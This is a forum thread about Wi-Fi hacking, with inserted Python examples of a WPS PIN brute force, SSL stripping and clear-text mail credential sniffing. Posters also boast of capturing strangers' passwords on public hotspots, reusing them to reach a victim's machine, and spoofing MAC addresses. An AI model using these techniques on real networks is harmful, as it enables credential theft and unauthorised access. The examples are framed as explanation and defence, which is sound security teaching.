Hacking through WIFI: what is possible?

LOL.

You think people type passwords? It's all automated buddy. When you open www.gmail.com or whatever it's just sent through again and the data is right there in the packet.

Typing it isn't the problem, it's the fact that it's generally cached already and gets sent hundreds of times back and forth.

I'm not sure I follow here. Surely, if you are already logged in, the password is not sent as clear-text but encrypted (SSL/TLS), except on broken sites? On most proper sites (e.g. Gmail, Facebook) even the session cookies are encrypted (I verified this with Wireshark), so even if somebody is sniffing your packets, how can they use this to get your password or even hijack your session?
 
If you are seriously interested you'll want to look at doing the CEH - Certified Ethical Hacker courses, but be warned it is one of the hardest exams in IT. You also need to be a little bit off your rocker...every single CEH or aspiring CEH I know is a bit of a whack job.

I found the CEH one of the most fun exams I've written. I mean where else do you get to look at network dumps and say what exploit is being used :)

The CISSP on the other hand was one of the most difficult exams I've written - this requires weeks and weeks of reading.
 
If your neighbor wants to use your Wi-Fi and you have WPS enabled he will have your WPA/WPA2 passphrase in less than 8 hours with reaver-wps...
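An added example (not from the thread, and not reaver's own code) of why the WPS attack above finishes in hours rather than years: an 8-digit WPS PIN carries a checksum in its last digit, and the registrar protocol acknowledges the first four digits separately from the last three, so the search space collapses from 10^7 to at most 11,000 guesses. The `FakeRegistrar` class is a constructed stand-in for an access point and the PINs are made up; reaver performs the same half-by-half search over real EAP exchanges.

```python
"""
Added example, not from the thread: why reaver's WPS attack finishes in hours.
A WPS PIN is 8 digits, the last of which is a checksum, and the registrar
protocol acknowledges the first 4 digits separately from the last 3, so an
attacker needs at most 10**4 + 10**3 = 11,000 guesses instead of 10**7.
FakeRegistrar is a constructed stand-in for an access point; the PINs are
made up.
"""
from typing import Optional


def wps_checksum(pin7: int) -> int:
    """Checksum digit for a 7-digit WPS PIN prefix (the algorithm from the WPS spec)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if the 8-digit PIN's last digit is the correct checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class FakeRegistrar:
    """Constructed model of an AP's WPS registrar.

    The real protocol leaks the same two facts: the AP answers with a NACK
    after message M4 when the first half is wrong, and after M6 when the
    second half is wrong, so each half can be attacked on its own.
    """

    def __init__(self, pin: str):
        assert is_valid_wps_pin(pin), "constructed PIN must carry a valid checksum"
        self._pin = pin
        self.attempts = 0

    def check_first_half(self, half: str) -> bool:
        self.attempts += 1
        return half == self._pin[:4]

    def check_second_half(self, half: str) -> bool:
        self.attempts += 1
        return half == self._pin[4:]


def brute_force_pin(ap: FakeRegistrar) -> Optional[str]:
    """Recover the PIN half by half, computing the checksum digit instead of guessing it."""
    first = None
    for i in range(10_000):
        guess = f"{i:04d}"
        if ap.check_first_half(guess):
            first = guess
            break
    if first is None:
        return None
    for j in range(1_000):
        tail = f"{j:03d}"
        second = tail + str(wps_checksum(int(first + tail)))
        if ap.check_second_half(second):
            return first + second
    return None


def worst_case_attempts() -> int:
    """Upper bound on guesses: every first half, then every second half."""
    return 10_000 + 1_000


if __name__ == "__main__":
    ap = FakeRegistrar("12345670")
    print(brute_force_pin(ap), "after", ap.attempts, "attempts;",
          "worst case is", worst_case_attempts())
```

Each guess against a real AP costs a full EAP exchange of a few seconds, which is where the "less than 8 hours" comes from; the only fix that removes the problem is turning WPS off on the router.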
 

Nope. The password is not sent again. The login-/session cookies are and typically it's done via HTTPS. The "only" way this can be intercepted is via man-in-the-middle attacks or session hijacking, but the hacker will never know the password. There is an exception, and this is when you run for example a rogue Wifi access point / honeypot (such as the Wifi Pineapple - https://www.wifipineapple.com/) where the rogue AP will just rewrite HTTP requests to non-SSL and hence get your passwords.

This is even more an issue on mobile phones which hide the browser's address-bar.
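An added example (not from the thread, and not the Wifi Pineapple's own code) modelling the rogue-AP rewrite described above and the client-side check that defeats it. `strip_tls_from_response` does to a relayed response what an SSL-stripping proxy does, so the victim's browser only ever sees plaintext URLs; `browser_url_for` shows why a site already in the browser's HSTS store never issues the plaintext request at all. The host names and page body are constructed for the example.

```python
"""
Added example, not from the thread: a model of what an SSL-stripping rogue AP
does to a relayed HTTP response, and the browser-side HSTS check that stops
it. Host names, headers and the page body are constructed.
"""
import re
from typing import Dict, Optional, Set, Tuple
from urllib.parse import urlsplit, urlunsplit

Headers = Dict[str, str]


def strip_tls_from_response(headers: Headers, body: str) -> Tuple[Headers, str]:
    """What an SSL-stripping proxy does to a response it relays to the victim.

    The proxy speaks TLS to the real server itself, then hands the victim a
    version in which every https:// link has become http://, a redirect to
    HTTPS points back at plaintext, and the Strict-Transport-Security header
    is dropped so the browser never learns that this host requires TLS.
    """
    out: Headers = {}
    for name, value in headers.items():
        if name.lower() == "strict-transport-security":
            continue
        if name.lower() == "location":
            value = value.replace("https://", "http://", 1)
        out[name] = value
    return out, body.replace("https://", "http://")


def form_action(body: str) -> Optional[str]:
    """Where the login form in an HTML body will POST its credentials."""
    m = re.search(r'action="([^"]+)"', body)
    return m.group(1) if m else None


def browser_url_for(url: str, hsts_hosts: Set[str]) -> str:
    """What a browser does before sending a request: upgrade to https if the
    host is in its HSTS store (learned on an earlier TLS visit, or preloaded).
    An upgraded request never crosses the Wi-Fi in plaintext, so the proxy
    has nothing to rewrite."""
    parts = urlsplit(url)
    if parts.scheme == "http" and parts.hostname in hsts_hosts:
        return urlunsplit(("https", parts.netloc, parts.path, parts.query, parts.fragment))
    return url


# Constructed sample: a made-up site's login page as the real server sends it.
SERVER_HEADERS: Headers = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
}
SERVER_BODY = (
    '<form method="POST" action="https://mail.example.test/login">'
    '<input name="user"><input name="pass" type="password"></form>'
)

if __name__ == "__main__":
    stripped_headers, stripped_body = strip_tls_from_response(SERVER_HEADERS, SERVER_BODY)
    print("victim posts credentials to:", form_action(stripped_body))
    print("HSTS header survived:", "Strict-Transport-Security" in stripped_headers)
    print("browser with HSTS entry requests:",
          browser_url_for("http://mail.example.test/login", {"mail.example.test"}))
```

The only visible symptom on the victim's side is a missing padlock and an `http://` in the address bar, which is exactly what a phone browser that hides its address bar takes away from the user.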
 

Yes it's mostly HTTPS.

"Typical" is not the one that catches you though...it's the rest.

Which is why I made the point that the worst problem is that one little service that isn't as secure which uses the same password as everything else.

In the case of pop3/imap I do believe the username/password is sent every time and that's normally what's easy to intercept.

Also many people stupidly choose not to remain logged in, but then use a saved password system anyway which does send all the username/password information each time they click login from the logon screen.

Not to mention the porn site logins I've intercepted are always entered manually for obvious reasons. So you simply grab that password and use it with the usernames you've picked up from other services and half the time they work.
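An added example (not from the thread) of what a sniffer on a hotspot actually pulls out of a mail client that logs in without TLS, the POP3/IMAP case raised in the post above. `extract_mail_creds` walks a captured session and returns every username and password that crossed the wire in the clear: POP3 `USER`/`PASS`, IMAP `LOGIN`, and IMAP `AUTHENTICATE PLAIN` (which is only base64, not encryption). It stops at `STLS`/`STARTTLS` because everything after that is inside TLS. The captures are constructed for the example and the accounts do not exist.

```python
"""
Added example, not from the thread: extracting clear-text POP3/IMAP logins
from a captured session. Captures below are constructed, not real traffic.
"""
import base64
import binascii
import shlex
from typing import List, Tuple


def _words(payload: str) -> List[str]:
    """Tokenise a command line, honouring IMAP quoted strings; fall back to plain split."""
    try:
        return shlex.split(payload)
    except ValueError:
        return payload.split()


def extract_mail_creds(capture: List[str]) -> List[Tuple[str, str, str]]:
    """Return (mechanism, username, password) for each clear-text login in a session.

    Each capture line is prefixed "C:" (client to server) or "S:" (server to client).
    """
    found: List[Tuple[str, str, str]] = []
    pop3_user = None
    expect_plain_blob = False
    for line in capture:
        who, _, payload = line.partition(" ")
        payload = payload.strip()
        if who != "C:":
            continue  # server replies carry no secrets for these mechanisms
        if expect_plain_blob:
            # SASL PLAIN: base64("authzid\0authcid\0password"), sent after the server's "+"
            expect_plain_blob = False
            try:
                parts = base64.b64decode(payload, validate=True).split(b"\x00")
            except (binascii.Error, ValueError):
                continue
            if len(parts) == 3:
                found.append(("IMAP AUTH PLAIN", parts[1].decode(), parts[2].decode()))
            continue
        words = _words(payload)
        if not words:
            continue
        verb = words[0].upper()
        if verb == "STLS" or (len(words) > 1 and words[1].upper() == "STARTTLS"):
            break  # the rest of the stream is TLS; a sniffer sees nothing useful
        if verb == "USER" and len(words) > 1:            # POP3
            pop3_user = words[1]
        elif verb == "PASS" and pop3_user and len(words) > 1:
            found.append(("POP3", pop3_user, words[1]))
            pop3_user = None
        elif len(words) > 1:                              # IMAP: "<tag> <command> ..."
            cmd = words[1].upper()
            if cmd == "LOGIN" and len(words) >= 4:
                found.append(("IMAP LOGIN", words[2], words[3]))
            elif cmd == "AUTHENTICATE" and len(words) > 2 and words[2].upper() == "PLAIN":
                expect_plain_blob = True
    return found


# Constructed captures (not real traffic; the accounts do not exist).
POP3_CAPTURE = [
    "S: +OK POP3 server ready",
    "C: USER alice",
    "S: +OK",
    "C: PASS hunter2",
    "S: +OK Logged in.",
]
IMAP_LOGIN_CAPTURE = [
    "S: * OK IMAP4rev1 ready",
    'C: a001 LOGIN bob "s3cret pw"',
    "S: a001 OK LOGIN completed",
]
IMAP_PLAIN_CAPTURE = [
    "S: * OK IMAP4rev1 ready",
    "C: a001 AUTHENTICATE PLAIN",
    "S: +",
    "C: " + base64.b64encode(b"\x00carol\x00password").decode(),
    "S: a001 OK",
]
STARTTLS_CAPTURE = [
    "S: * OK IMAP4rev1 ready",
    "C: a001 STARTTLS",
    "S: a001 OK Begin TLS negotiation now",
    "C: <TLS record bytes 16 03 03 ...; the LOGIN happens in here>",
]

if __name__ == "__main__":
    for name, cap in [("POP3", POP3_CAPTURE), ("IMAP LOGIN", IMAP_LOGIN_CAPTURE),
                      ("IMAP PLAIN", IMAP_PLAIN_CAPTURE), ("STARTTLS", STARTTLS_CAPTURE)]:
        print(name, "->", extract_mail_creds(cap))
```

A mail client set to "no encryption" or "STARTTLS if available" on a hotspot is the case this catches; a client configured to require TLS (or ports 995/993) gives the sniffer the empty result of the last capture.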
 

That is the biggest problem. Most people only use one "secure" password for everything. Best option is to use machine generated passwords (such as via 1Password) and 2FA (two-factor authentication) and there is no issue. Only downside is that if your password to your password manager is compromised or you forget your 2FA backup codes you are pretty much toast.
 
Yeah. When I was on OSX it was Keychain only.

Now I'm a bit lost on Windows.
 
@SauRoNZA It sounds like you have been doing what I was thinking of researching and doing at the airport while I wait for my plane. This makes me more curious to have a look into all of this. Any pointers?

I'm so surprised by all the always-on hotspots out there, it would be so easy to create a rogue one and just capture all the incoming traffic, and then you have this movement to put Wifi in taxis...SA people really don't seem to take security seriously.

On a side note, hiding your SSID is not a form of security because the PC or phone that is set to connect is then consistently sending out a request to connect to the SSID just in case it is in range...
 
Trust me it's amazing how much I've intercepted in a mere 15 minutes at the airport hotspots on many occasions when flying for business....and I'm an amateur.

Most recently I was away for business and stayed at a guest house with free wifi. By the second evening I had access to someone else's email, porn sites (yes they paid for them) and direct access to their machine and all the data on it purely because they were stupid enough to use the same password everywhere.

Your best defense against this is using 2-stage authentication on every service that offers it.

I used to do that a while ago when I was waiting for flights.
All kinds of stuff visible on those networks.
Interestingly enough, if you pick up the MAC of someone that has paid to use the AP then you can spoof your address to be the same and you get free internets.
 
Yup, very simple to do that if you have the software loaded before hand to do so.

Not so simple running Backtrack as your primary OS and not getting people looking at you a bit funny...or worse still interested because it's non-Windows and non-OSX, which is all they know.
 
You aren't that important, nobody cares about your home network. (I'm not saying make your WPA2 key 123456 or leave it wide open) and nobody is going to park outside your house and use a long range wireless sniffer to try and crack your network.

Well, if someone has say, a (CPE) Ubiquiti/TP-Link/RouterBoard/etc.. or a good wifi grid/patch panel (connected to a wifi card/USB wifi dongle) outside and pointed at someone's house with ADSL or something and it's easily accessed/or open, they have free internet from your home connection. So securing your home router is important in my opinion. In today's society, wifi is everywhere and with a good antenna, you can access someone's home network from 30km away.
 

Like I said, I'm not advocating leaving it wide open or anything like that.

But you also don't need a 256 character cypher as wireless key.
 
Teach Meeeeee Mr Miyagi

I wanna be your Daniel-son

 
I think you should be asking hackerjargon he seems to be Pro at this.

I've just dabbled.

Yes but.. Not everyone wants to share. I've found some build up this silly ego thing about it. Self-righteous grin and they tell me to learn it myself. I'm too daft to learn on my own. I want to be shown and ask questions.
 